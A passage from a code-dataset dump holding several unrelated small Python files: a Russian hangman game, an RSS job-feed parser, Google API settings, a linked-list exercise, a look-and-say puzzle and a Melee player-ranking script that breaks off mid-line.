\"ДОРОГА\":\"Если б встала, до неба достала б.\",\n \"День\":\"К вечеру умирает, по утру оживает.\",\n \"РАДИО\":\"В Москве говорят, а у нас слышно.\",\n \"ВРЕМЯ\":\"Без ног и без крыльев оно, быстро летит, не догонишь его.\",\n \"ТУАЛЕТНАЯ\":\"Самая популярная бумага\",\n \"СЕКРЕТОМ\":\"Чем можно поделиться только один раз?\"}\n\nkey = random.choice(list(words.keys()))\nlength = \"-\"*len(key)\nwrong = 0\nused = []\nwhile wrong_<\")\n print(HANGMAN[wrong])\nelse:\n print(\"Уря! У тебя получилось!\")\nprint(\"Вы предлагали следующие буквы: \",used)\nprint(\"Отгаданное вами в слове выглядит так: \",length,\"\\n\")\nprint(\"Было загадано слово \",key)\ninput(\"Нажмите Enter, чтобы выйти ;)\")\n","sub_path":"Viselica.py","file_name":"Viselica.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"652029307","text":"import feedparser\nfrom models import JobOffer\n\nclass Stackoverflow(object):\n \"\"\" This class parses the response of the search for remote jobs in stackoverflow \"\"\"\n \n def parse(self):\n \"\"\" Parses the results of the stackoverflow remote jobs search into a list of JobOffer objects \"\"\"\n url = \"https://stackoverflow.com/jobs/feed?l=Remote&u=Km&d=20\"\n feed = feedparser.parse(url)\n\n job_offers = []\n for entry in feed.entries:\n tags = self.extractTags(entry[\"tags\"])\n job_offer = JobOffer(entry[\"link\"], entry[\"title\"], entry[\"description\"], entry[\"author\"], entry[\"updated\"], tags)\n job_offers.append(job_offer)\n \n return job_offers\n\n def extractTags(self, tags):\n extracted_tags = []\n for tag in tags:\n extracted_tags.append(tag[\"term\"])\n\n return extracted_tags\n\nclass WeWorkRemotely(object):\n \"\"\" This class parses the response of the weworkremotely remote programming jobs rss feed \"\"\"\n\n def parse(self):\n \"\"\" Parses the results of the weworkremotely remote programming jobs into a list of JobOffer objects \"\"\"\n\n url = \"https://weworkremotely.com/categories/remote-programming-jobs.rss\"\n feed = feedparser.parse(url)\n\n job_offers = []\n for entry in feed.entries:\n job_offer = JobOffer(entry[\"link\"], entry[\"title\"], entry[\"summary\"], entry[\"title\"].split(\":\")[0], entry[\"published\"], \"\")\n job_offers.append(job_offer)\n \n return job_offers","sub_path":"rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"143602654","text":"from __future__ import unicode_literals\n\nSCOPES = [\n 'https://www.googleapis.com/auth/admin.directory.group.member',\n 'https://www.googleapis.com/auth/admin.directory.user',\n 'https://www.googleapis.com/auth/spreadsheets.readonly',\n 'https://www.googleapis.com/auth/admin.directory.group'\n]\n\n# Stores API key\nSERVICE_ACCOUNT_FILE = 'secret/service.json'\n\n# Elections spreadsheet\nSPREADSHEET_ID = '1wnZfinKlVUsdXaz-W0ACnb_G7HFfDVlpudUSGpA1GrM'\n\nNEW_OFFICER_SHEET = 'New Officers Fa19'\n# OLD_OFFICER_SHEET = 'Returning Officers'\nMEMBER_SHEET = 'New Members Fa19'\n\nNEW_OFFICER_SHEET_ID = '75212080'\n# OLD_OFFICER_SHEET_ID = '682750401'\nMEMBER_SHEET_ID = '308324716'\n\nNEW_OFFICER_RANGE = '\\'{}\\'!A:F'.format(NEW_OFFICER_SHEET)\n#OLD_OFFICER_RANGE = '\\'{}\\'!A:F'.format(OLD_OFFICER_SHEET)\nMEMBER_RANGE = '\\'{}\\'!A:F'.format(MEMBER_SHEET)\n","sub_path":"hknlib/election/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"285903570","text":"'''\npg 116 \n'''\nx=-1\n#this is a conditional statement in python\ny = 1 if x > 0 else -1\n\n#the conditional does the same thing as this if else statement\n'''\nif x > 0:\n y = 1\nelse:\n y = -1\n''' \nprint(y)","sub_path":"PythonLearn/ch_4/ConditionalDemo.py","file_name":"ConditionalDemo.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419927673","text":"#!/usr/bin/env python2\n\nimport optparse\nimport os\nimport sys\n\nimport corpus.models as models\n\noptionParser = optparse.OptionParser(usage=\"%s \" % os.environ[\"ESMT_PROG_NAME\"], add_help_option=False)\noptionParser.add_option(\"-h\", \"--help\", action=\"help\", help=optparse.SUPPRESS_HELP)\noptionParser.add_option(\"-i\", \"--id\", dest=\"id\", help=\"language id (2 characters)\", metavar=\"ID\")\noptionParser.add_option(\"-l\", \"--language\", dest=\"language\", help=\"language name\", metavar=\"LANG\")\noptionParser.add_option(\"-n\", \"--native\", dest=\"native\", help=\"native language name\", metavar=\"LANG\")\n(options, args) = optionParser.parse_args()\n\nif not options.id:\n optionParser.error(\"No language id given\")\nif not options.language:\n optionParser.error(\"No language name given\")\nif not options.native:\n sys.stderr.write(\"Warning: no native language name given, taking english name\")\n options.native = options.language\n\nlog = sys.stdout\n\nif models.Language.objects.filter(name=options.id).exists():\n sys.stderr.write(\"Error: language \\\"%s\\\" already exists in the database\\n\" % options.id)\n sys.exit(1)\n\nl = models.Language(name=options.id, english_name=options.language, native_name=options.native)\nl.save()\nlog.write(\"Language %s => %s added to the database\\n\" % (l.name, l.english_name))\n","sub_path":"appraise/bin/addLanguage.py","file_name":"addLanguage.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"488902729","text":"import sys\nsys.path.append(\"../\")\nfrom create import *\n\nclass Solution:\n def reversekgroup(self, head, k):\n t, l = head, 0\n while t:\n t = t.next\n l += 1\n dum = p = ListNode(0)\n p.next = head\n for _ in range(l//k):\n tmp = None\n for _ in range(k):\n node = head\n head = head.next\n node.next = tmp\n tmp = node\n p1 = p.next\n p.next = tmp\n p1.next = head\n p = p1\n return dum.next\n\nif __name__ == \"__main__\":\n nums1, k = [1,2,3,4,5,6,7,8,9, 10], 3\n\n l = LinkList()\n h1 = l.create_list(nums1)\n l.print_list(h1)\n app = Solution()\n newh = app.reversekgroup(h1, k)\n l.print_list(newh)\n","sub_path":"exercise/lc/tag/list/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"318044353","text":"PUZZLE_INPUT = 1113122113\n\nsequence = str(PUZZLE_INPUT)\nfor i in range(50):\n print('iteration', i+1)\n\n i, j = 0, 0\n new_seq = []\n while i < len(sequence):\n while j < len(sequence) and sequence[j] == sequence[i]:\n j += 1\n \n size = j - i\n \n new_seq.append(str(size))\n new_seq.append(str(sequence[i]))\n\n i = j\n \n sequence = new_seq.copy()\n\nprint(len(sequence))","sub_path":"10/day10_b.py","file_name":"day10_b.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"110907045","text":"# ETossed's Algorithmic Ranking of Melee\r\n# This is a MAJOR work in progress, and I'm getting a foundation down for\r\n# a more advanced ranking at some point\r\n\r\n# Tournament is to be implemented in more complicated ELO system later\r\n# Non-Local tournamnets are the only one that counts. Superlocals (i.e. Nimbus 70) do count.\r\n\r\nimport math\r\n\r\nclass Tournament(object):\r\n def __init__(self, name, size, winner):\r\n self.name = name\r\n self.size = size\r\n self.winner = winner\r\n\r\n def __repr__(self):\r\n temp = None\r\n if self.size == 1:\r\n temp = \"Superlocal (Non-Cali)\"\r\n if self.size == 2:\r\n temp = \"Regional\"\r\n elif self.size == 3:\r\n temp = \"Super Regional\"\r\n elif self.size == 4:\r\n temp = \"Major\"\r\n elif self.size == 5:\r\n temp = \"Super Major\"\r\n return \"Tournament: \" + self.name + \"| Size: \" + temp + \" | Winner: \" + self.winner.tag\r\n\r\nclass Player(object):\r\n def __init__(self, tag, rank):\r\n self.tag = tag\r\n self.rank = rank\r\n self.sets_played = 0\r\n self.tournaments = []\r\n self.wins = []\r\n self.losses = []\r\n self.melee_lvl = 1000\r\n\r\n def __lt__(self, other):\r\n return self.melee_lvl < other.melee_lvl\r\n\r\n def __repr__(self):\r\n return self.tag + \" EAR-M: \" + str(self.melee_lvl)\r\n\r\n def printTournaments(self):\r\n tournamentString = self.tag + \"'s Tournaments Attended: \"\r\n for i in range(len(self.tournaments)):\r\n tournamentString += (\"\\n\" + self.tournaments[i].name)\r\n print(tournamentString)\r\n\r\n # ACTUAL CALCULATION DONE BELOW\r\n # STATIC ALGORITHM\r\n def lvl_calculator(self, tournament, placement, opponents, history):\r\n # Tournament is the tournament that was attended\r\n # Placement is the player's placement at that tournament\r\n # Opponents is a player array\r\n # History is the list correlated with opponents with w or l\r\n if len(opponents) != len(history):\r\n print(\"ERROR: Amount of matches does not match amount of opponents for \" + self.tag + \" - \" + tournament.name)\r\n return\r\n\r\n self.tournaments.append(tournament)\r\n\r\n # Result loop\r\n for i in range(len(opponents)):\r\n self.sets_played += 1\r\n\r\n # For Wins\r\n if history[i] == \"w\":\r\n if opponents[i] in self.wins:\r\n self.melee_lvl += (5 * (((101 - opponents[i].rank) * (math.log((101-opponents[i].rank)))) / 100))\r\n else:\r\n self.wins.append(opponents[i])\r\n self.melee_lvl += (10 * (((101 - opponents[i].rank) * (math.log((101-opponents[i].rank)))) / 100))\r\n\r\n # For Losses\r\n elif history[i] == \"l\":\r\n if opponents[i] in self.losses:\r\n self.melee_lvl -= (3.5 * ((opponents[i].rank * (math.log(opponents[i].rank)))/ 100))\r\n else:\r\n self.losses.append(opponents[i])\r\n self.melee_lvl -= (7 * ((opponents[i].rank * (math.log(opponents[i].rank)))/ 100))\r\n\r\n # For neither\r\n else:\r\n raise ValueError('NotWOrL')\r\n\r\n # Placement Integration?\r\n if placement == 1:\r\n placement = 10\r\n elif placement == 2:\r\n placement = 9\r\n elif placement == 3:\r\n placement = 8\r\n elif placement == 4:\r\n placement = 6\r\n elif placement == 5:\r\n placement = 4\r\n elif placement == 7:\r\n placement = 3\r\n elif placement == 9:\r\n placement = 2\r\n elif placement == 13:\r\n placement = 1\r\n elif placement == 17:\r\n placement = 0\r\n elif placement == 25:\r\n placement = -1\r\n elif placement == 33:\r\n placement = -2\r\n elif placement == 49:\r\n placement = -3\r\n elif placement == 65:\r\n placement = -4\r\n elif placement == 97:\r\n placement = -5\r\n elif placement == 129:\r\n placement = -6\r\n else:\r\n placement = 0\r\n print(\"Placement error with \" + self.tag + \" at \" + tournament.name)\r\n\r\n neg = False\r\n if (placement - (10 - (tournament.size * 2))) < 0:\r\n neg = True\r\n\r\n p_s = ((placement - (10 - (tournament.size * 2)))**2) * tournament.size\r\n if neg == True:\r\n p_s *= -1\r\n\r\n self.melee_lvl += p_s\r\n\r\ndef printSortedPlayers(players):\r\n players.sort(reverse=True)\r\n newPlayerList = []\r\n for i in range(len(players)):\r\n if players[i].melee_lvl != 1000:\r\n newPlayerList.append(players[i])\r\n for i in range(len(newPlayerList)):\r\n print(str(i+1) + \". \" + newPlayerList[i].tag + \" | 2019 Rank: \" + (str(newPlayerList[i].rank)) + \" | EAR-M: \" + (str(\"{:.2f}\".format(newPlayerList[i].melee_lvl))) + \"\\n\")\r\n\r\n# GIANT LIST OF PLAYERS BELOW\r\n\r\nHungrybox = Player(\"Hungrybox\", 1)\r\nLeffen = Player(\"Leffen\", 2)\r\nMango = Player(\"Mango\", 3)\r\nAxe = Player(\"Axe\", 4)\r\nWizzrobe = Player(\"Wizzrobe\", 5)\r\nZain = Player(\"Zain\", 6)\r\naMSa = Player(\"aMSa\", 7)\r\nPlup = Player(\"Plup\", 8)\r\niBDW = Player(\"iBDW\", 9)\r\nMew2King = Player(\"Mew2King\", 10)\r\nS2J = Player(\"S2J\", 11)\r\nFiction = Player(\"Fiction\", 12)\r\nSFAT = Player(\"SFAT\", 13)\r\nMoky = Player(\"moky\", 14)\r\nn0ne = Player(\"n0ne\", 15)\r\nTrif = Player(\"Trif\", 16)\r\nCaptain_Faceroll = Player(\"Captain Faceroll\", 17)\r\nSwedish_Delight = Player(\"Swedish Delight\", 18)\r\nHax = Player(\"Hax$\", 19)\r\nLucky = Player(\"Lucky\", 20)\r\nGinger = Player(\"Ginger\", 21)\r\nSpark = Player(\"Spark\", 22)\r\nChuDat = Player(\"ChuDat\", 23)\r\nPewPewU = Player(\"PewPewU\", 24)\r\nARMY = Player(\"ARMY\", 25)\r\nlloD = Player(\"lloD\", 26)\r\nAbsentPage = Player(\"AbsentPage\", 27)\r\nBananas = Player(\"Bananas\", 28)\r\nKJH = Player(\"KJH\", 29)\r\nShroomed = Player(\"Shroomed\", 30)\r\nWestballz = Player(\"Westballz\", 31)\r\nMedz = Player(\"Medz\", 32)\r\nMikeHaze = Player(\"MikeHaze\", 33)\r\nProfessor_Pro = Player(\"Professor Pro\", 34)\r\nTwoSaint = Player(\"2Saint\", 35)\r\nGahtzu = Player(\"Gahtzu\", 36)\r\nAlbert = Player(\"Albert\", 37)\r\nSpud = Player(\"Spud\", 38)\r\nFatGoku = Player(\"FatGoku\", 39)\r\nRishi = Player(\"Rishi\", 40)\r\nBimbo = Player(\"Bimbo\", 41)\r\nSetchi = Player(\"Setchi\", 42)\r\nMagi = Player(\"Magi\", 43)\r\nMorsecode = Player(\"Morecode762\", 44)\r\nJakenShaken = Player(\"JakenShaken\", 45)\r\nHugS = Player(\"HugS\", 46)\r\nStango = Player(\"Stango\", 47)\r\nZamu = Player(\"Zamu\", 48)\r\nDrephen = Player(\"Drephen\", 49)\r\nMichael = Player(\"Michael\", 50)\r\nIce = Player(\"Ice\", 51)\r\nbillybopeep = Player(\"billybopeep\", 52)\r\nLa_Luna = Player(\"La Luna\", 53)\r\nColbol = Player(\"Colbol\", 54)\r\nOverTriforce = Player(\"OverTriforce\", 55)\r\nSlox = Player(\"Slox\", 56)\r\nKalamazhu = Player(\"Kalamazhu\", 57)\r\nNickemwit = Player(\"Nickemwit\", 58)\r\nJerry = Player(\"Jerry\", 59)\r\nAura = Player(\"Aura\", 60)\r\nNut = Player(\"Nut\", 61)\r\nKalvar = Player(\"Kalvar\", 62)\r\nPolish = Player(\"Polish\", 63)\r\nKevin_Maples = Player(\"Kevin Maples\", 64)\r\nBladewise = Player(\"Bladewise\", 65)\r\nTai = Player(\"Tai\", 66)\r\nSquid = Player(\"Squid\", 67)\r\nForrest = Player(\"Forrest\", 68)\r\nJoyboy = Player(\"Joyboy\", 69)\r\nKodorin = Player(\"Kodorin\", 70)\r\nRyan_Ford = Player(\"Ryan Ford\", 71)\r\nFree_Palestine = Player(\"Free Palestine\", 72)\r\nRyobeat = Player(\"Ryobeat\", 73)\r\nKa_Master = Player(\"Ka-Master\", 74)\r\nKurv = Player(\"Kurv\", 75)\r\nFrenzy = Player(\"Frenzy\", 76)\r\nMoG = Player(\"MoG\", 77)\r\nBoyd = Player(\"Boyd\", 78)\r\nCool_Lime = Player(\"Cool Lime\", 79)\r\nBBB = Player(\"Bobby Big Ballz\", 80)\r\nNintendude = Player(\"Nintendude\", 81)\r\nFranz = Player(\"Franz\", 82)\r\nNicki = Player(\"Nicki\", 83)\r\nlint = Player(\"lint\", 84)\r\nKing_Momo = Player(\"King Momo\", 85)\r\nTheRealThing = Player(\"TheRealThing\", 86)\r\nUmarth = Player(\"Umarth\", 87)\r\nZeo = Player(\"Zeo\", 88)\r\nPricent = Player(\"Pricent\", 89)\r\nPrince_Abu = Player(\"Prince Abu\", 90)\r\nAmsah = Player(\"Amsah\", 91)\r\nRocky = Player(\"Rocky\", 92)\r\nSharkz = Player(\"Sharkz\", 93)\r\nHTwa = Player(\"HTwa\", 94)\r\nKage = Player(\"Kage\", 95)\r\nSchythed = Player(\"Schythed\", 96)\r\nPanda = Player(\"Panda\", 97)\r\nSoonsay = Player(\"Soonsay\", 98)\r\nTheSWOOPER = Player(\"TheSWOOPER\", 99)\r\nSnowy = Player(\"Snowy\", 100)\r\nPlus100 = Player(\"Player Worse than Rank 100\", 101)\r\n\r\nplayer_list = [Hungrybox, Leffen, Mango, Axe, Wizzrobe, Zain, aMSa, Plup, iBDW, Mew2King, S2J, Fiction, SFAT, Moky, n0ne, Trif, Captain_Faceroll, Swedish_Delight, Hax, Lucky, Ginger, Spark, ChuDat, PewPewU, ARMY, lloD, AbsentPage, Bananas, KJH, Shroomed, Westballz, Medz, MikeHaze, Professor_Pro, TwoSaint, Gahtzu, Albert, Spud, FatGoku, Rishi, Bimbo, Setchi, Magi, Morsecode, JakenShaken, HugS, Stango, Zamu, Drephen, Michael, Ice, billybopeep, La_Luna, Colbol, OverTriforce, Slox, Kalamazhu, Nickemwit, Jerry, Aura, Nut, Kalvar, Polish, Kevin_Maples, Bladewise, Tai, Squid, Forrest, Joyboy, Kodorin, Ryan_Ford, Free_Palestine, Ryobeat, Ka_Master, Kurv, Frenzy, MoG, Boyd, Cool_Lime, BBB, Nintendude, Franz, Nicki, lint, King_Momo, TheRealThing, Umarth, Zeo, Pricent, Prince_Abu, Amsah, Rocky, Sharkz, HTwa, Kage, Schythed, Panda, Soonsay, TheSWOOPER, Snowy]\r\n\r\n# GIANT LIST OF PLAYERS DONE\r\n\r\n# TOURNAMENTS CONSIDERED\r\n\r\nValhalla3 = Tournament(\"Valhalla III\", 3, Leffen)\r\nGenesis7 = Tournament(\"Genesis 7\", 5, Zain)\r\nSavingMrLombardi2 = Tournament(\"Saving Mr. Lombardi 2\", 3, Fiction)\r\nSmashSummit9 = Tournament(\"Smash Summit 9\", 4, Hungrybox)\r\nHTL5 = Tournament(\"Hold That L 5\", 1, Ginger)\r\nDreamhackAnaheim = Tournament(\"Dreamhack Anaheim 2020\", 2, Fiction)\r\n\r\ndef main():\r\n # If a player's comment says \"NONE\" it means they have not attended any tournaments on the list above\r\n\r\n # Hungrybox\r\n Hungrybox1O = [Spud, Captain_Faceroll, PewPewU, Zain, Fiction, Hax, Mango, Zain]\r\n Hungrybox1R = [\"w\", \"w\", \"w\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Hungrybox2O = [Hax, aMSa, Mango, Fiction, Plup, n0ne, Mango, Plup, Plup, Plup]\r\n Hungrybox2R = [\"w\", \"w\", \"w\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\"]\r\n Hungrybox.lvl_calculator(Genesis7, 2, Hungrybox1O, Hungrybox1R)\r\n Hungrybox.lvl_calculator(SmashSummit9, 1, Hungrybox2O, Hungrybox2R)\r\n\r\n # Leffen\r\n Leffen1O = [Frenzy, Professor_Pro, Professor_Pro]\r\n Leffen1R = [\"w\", \"w\", \"w\"]\r\n Leffen2O = [Schythed, MikeHaze, Hax, Fiction, Mango, Hax]\r\n Leffen2R = [\"w\", \"w\", \"w\", \"w\", \"l\", \"l\"]\r\n Leffen3O = [Spark, Wizzrobe, Axe, n0ne, Zain, BBB, Mango, iBDW]\r\n Leffen3R = [\"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"l\", \"l\"]\r\n Leffen.lvl_calculator(Valhalla3, 1, Leffen1O, Leffen1R)\r\n Leffen.lvl_calculator(Genesis7, 5, Leffen2O, Leffen2R)\r\n Leffen.lvl_calculator(SmashSummit9, 9, Leffen3O, Leffen3R)\r\n\r\n # Mango\r\n Mango1O = [Nicki, Trif, aMSa, Leffen, Zain, Hungrybox]\r\n Mango1R = [\"w\", \"w\", \"w\", \"w\", \"l\", \"l\"]\r\n Mango2O = [Shroomed, Fiction, Hungrybox, aMSa, Hax, Plup, Leffen, Hungrybox, Axe, Zain, Plup]\r\n Mango2R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Mango.lvl_calculator(Genesis7, 3, Mango1O, Mango1R)\r\n Mango.lvl_calculator(SmashSummit9, 3, Mango2O, Mango2R)\r\n\r\n # Axe\r\n Axe1O = [Panda, Plup]\r\n Axe1R = [\"l\", \"l\"]\r\n Axe2O = [Zain, Leffen, Spark, Wizzrobe, Plup, aMSa, Fiction, Mango]\r\n Axe2R = [\"w\", \"l\", \"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Axe.lvl_calculator(Genesis7, 33, Axe1O, Axe1R)\r\n Axe.lvl_calculator(SmashSummit9, 5, Axe2O, Axe2R)\r\n\r\n # Wizzrobe\r\n Wizzrobe1O = [Ryobeat, Medz, Spark, Captain_Faceroll]\r\n Wizzrobe1R = [\"l\", \"w\", \"w\", \"l\"]\r\n Wizzrobe2O = [Leffen, Wizzrobe, iBDW, Axe, Fiction]\r\n Wizzrobe2R = [\"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Wizzrobe.lvl_calculator(Genesis7, 17, Wizzrobe1O, Wizzrobe1R)\r\n Wizzrobe.lvl_calculator(SmashSummit9, 9, Wizzrobe2O, Wizzrobe2R)\r\n\r\n # Zain\r\n Zain1O = [Boyd, JakenShaken, Shroomed, Hungrybox, Mango, Hungrybox]\r\n Zain1R = [\"w\", \"w\", \"w\", \"w\", \"w\", \"w\"]\r\n Zain2O = [n0ne, Axe, Wizzrobe, iBDW, Leffen, Fiction, Plup, iBDW, Mango]\r\n Zain2R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Zain.lvl_calculator(Genesis7, 1, Zain1O, Zain1R)\r\n Zain.lvl_calculator(SmashSummit9, 4, Zain2O, Zain2R)\r\n\r\n # aMSa\r\n aMSa1O = [Ice, Mew2King, Mango, n0ne]\r\n aMSa1R = [\"w\", \"w\", \"l\", \"l\"]\r\n aMSa2O = [Magi, Hungrybox, Pricent, Mango, Fiction, Shroomed, BBB, Axe]\r\n aMSa2R = [\"w\", \"l\", \"w\", \"l\", \"l\", \"w\", \"w\", \"l\"]\r\n aMSa.lvl_calculator(Genesis7, 9, aMSa1O, aMSa1R)\r\n aMSa.lvl_calculator(SmashSummit9, 9, aMSa2O, aMSa2R)\r\n\r\n # Plup\r\n Plup1O = [Rocky, PewPewU, Axe, ARMY]\r\n Plup1R = [\"w\", \"l\", \"w\", \"l\"]\r\n Plup2O = [Hax, Shroomed, Magi, Hungrybox, Mango, Axe, Zain, Hungrybox, Mango, Hungrybox, Hungrybox]\r\n Plup2R = [\"l\", \"w\", \"w\", \"l\", \"w\", \"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Plup.lvl_calculator(Genesis7, 25, Plup1O, Plup1R)\r\n Plup.lvl_calculator(SmashSummit9, 2, Plup2O, Plup2R)\r\n\r\n # iBDW\r\n iBDW1O = [BBB, ARMY, PewPewU, Ice, Captain_Faceroll]\r\n iBDW1R = [\"w\", \"w\", \"l\", \"w\", \"l\"]\r\n iBDW2O = [Trif, ARMY, Albert, Lucky, Kalamazhu, Squid, Professor_Pro, Fiction, S2J, Fiction]\r\n iBDW2R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n iBDW3O = [BBB, n0ne, Zain, Wizzrobe, Spark, Pricent, Leffen, Hax, Zain]\r\n iBDW3R = [\"w\", \"l\", \"l\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n iBDW.lvl_calculator(Genesis7, 13, iBDW1O, iBDW1R)\r\n iBDW.lvl_calculator(SavingMrLombardi2, 2, iBDW2O, iBDW2R)\r\n iBDW.lvl_calculator(SmashSummit9, 5, iBDW3O, iBDW3R)\r\n\r\n # Mew2King\r\n Mew2King1O = [Soonsay, Professor_Pro, aMSa, ARMY, Swedish_Delight]\r\n Mew2King1R = [\"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Mew2King.lvl_calculator(Genesis7, 13, Mew2King1O, Mew2King1R)\r\n\r\n # S2J\r\n S2J1O = [Joyboy, Zain, Ryobeat, n0ne]\r\n S2J1R = [\"w\", \"l\", \"w\", \"l\"]\r\n S2J2O = [Ginger, Westballz, Ice, Prince_Abu, Franz, Kalamazhu, Professor_Pro, Lucky, Ginger, Professor_Pro, iBDW]\r\n S2J2R = [\"w\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n S2J3O = [Tai, ARMY, Fiction, Westballz, Fiction, Fiction]\r\n S2J3R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n S2J.lvl_calculator(Genesis7, 13, S2J1O, S2J1R)\r\n S2J.lvl_calculator(SavingMrLombardi2, 3, S2J2O, S2J2R)\r\n S2J.lvl_calculator(DreamhackAnaheim, 2, S2J3O, S2J3R)\r\n\r\n # Fiction\r\n Fiction1O = [Free_Palestine, ChuDat, Westballz, Leffen, Captain_Faceroll, n0ne, Hungrybox]\r\n Fiction1R = [\"w\", \"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Fiction2O = [Spark, Lucky, Bimbo, ARMY, Ginger, iBDW, iBDW]\r\n Fiction2R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"w\"]\r\n Fiction3O = [Pricent, Mango, Hax, Hungrybox, aMSa, Magi, Zain, Wizzrobe, Axe]\r\n Fiction3R = [\"w\", \"l\", \"w\", \"l\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Fiction4O = [Westballz, S2J, S2J, S2J]\r\n Fiction4R = [\"w\", \"w\", \"l\", \"w\"]\r\n Fiction.lvl_calculator(Genesis7, 5, Fiction1O, Fiction1R)\r\n Fiction.lvl_calculator(SavingMrLombardi2, 1, Fiction2O, Fiction2R)\r\n Fiction.lvl_calculator(SmashSummit9, 7, Fiction3O, Fiction3R)\r\n Fiction.lvl_calculator(DreamhackAnaheim, 1, Fiction4O, Fiction4R)\r\n\r\n # SFAT\r\n SFAT1O = [Tai, Ginger, billybopeep, Panda, Hax]\r\n SFAT1R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n SFAT2O = [Captain_Faceroll, MikeHaze, Professor_Pro, Kodorin, Nut, Ginger, Trif]\r\n SFAT2R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"l\", \"l\"]\r\n SFAT.lvl_calculator(Genesis7, 17, SFAT1O, SFAT1R)\r\n SFAT.lvl_calculator(SavingMrLombardi2, 9, SFAT2O, SFAT2R)\r\n\r\n # moky\r\n Moky1O = [Forrest, Nut, Kevin_Maples, Ryobeat]\r\n Moky1R = [\"l\", \"w\", \"l\", \"w\"]\r\n Moky.lvl_calculator(Genesis7, 33, Moky1O, Moky1R)\r\n\r\n # n0ne\r\n n0ne1O = [Kodorin, Hax, MikeHaze, Ginger, S2J, aMSa, Fiction]\r\n n0ne1R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n n0ne2O = [Zain, iBDW, Leffen, Spark, Ryobeat, Hungrybox, Hax]\r\n n0ne2R = [\"l\", \"w\", \"l\", \"w\", \"w\", \"l\", \"l\"]\r\n n0ne.lvl_calculator(Genesis7, 7, n0ne1O, n0ne1R)\r\n n0ne.lvl_calculator(SmashSummit9, 9, n0ne2O, n0ne2R)\r\n\r\n # Trif\r\n Trif1O = [Plus100, Frenzy, Plus100]\r\n Trif1R = [\"l\", \"w\", \"l\"]\r\n Trif2O = [Forrest, Mango, Swedish_Delight]\r\n Trif2R = [\"w\", \"l\", \"l\"]\r\n Trif3O = [Ginger, S2J, Westballz, SFAT, Captain_Faceroll, S2J]\r\n Trif3R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Trif4O = [iBDW, ARMY, Albert, Kalamazhu, Squid, SFAT, ARMY]\r\n Trif4R = [\"l\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n Trif.lvl_calculator(Valhalla3, 4, Trif1O, Trif1R)\r\n Trif.lvl_calculator(Genesis7, 17, Trif2O, Trif2R)\r\n Trif.lvl_calculator(SavingMrLombardi2, 7, Trif3O, Trif3R)\r\n\r\n # Captain Faceroll\r\n CF1O = [Bladewise, Swedish_Delight, Hungrybox, Wizzrobe, iBDW, Fiction]\r\n CF1R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n CF2O = [SFAT, MikeHaze, Professor_Pro, Kodorin, Nut, Prince_Abu, ARMY]\r\n CF2R = [\"l\", \"l\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Captain_Faceroll.lvl_calculator(Genesis7, 9, CF1O, CF1R)\r\n Captain_Faceroll.lvl_calculator(SavingMrLombardi2, 9, CF2O, CF2R)\r\n\r\n # Swedish Delight\r\n SD1O = [Kevin_Maples, Captain_Faceroll, La_Luna, Trif, Mew2King, Shroomed]\r\n SD1R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Swedish_Delight.lvl_calculator(Genesis7, 9, SD1O, SD1R)\r\n\r\n # Hax$\r\n Hax1O = [Aura, n0ne, Leffen, SFAT, Westballz, PewPewU, Shroomed, Leffen, Hungrybox]\r\n Hax1R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n Hax2O = [Hungrybox, Plup, Fiction, Mango, Pricent, Spark, n0ne, iBDW]\r\n Hax2R = [\"l\", \"w\", \"l\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Hax.lvl_calculator(Genesis7, 4, Hax1O, Hax1R)\r\n Hax.lvl_calculator(SmashSummit9, 7, Hax2O, Hax2R)\r\n\r\n # Lucky\r\n Lucky1O = [Ice, Plus100]\r\n Lucky1R = [\"l\", \"l\"]\r\n Lucky2O = [Fiction, Spark, Bimbo, Plus100, iBDW, MikeHaze, S2J]\r\n Lucky2R = [\"w\", \"w\", \"w\", \"l\", \"l\", 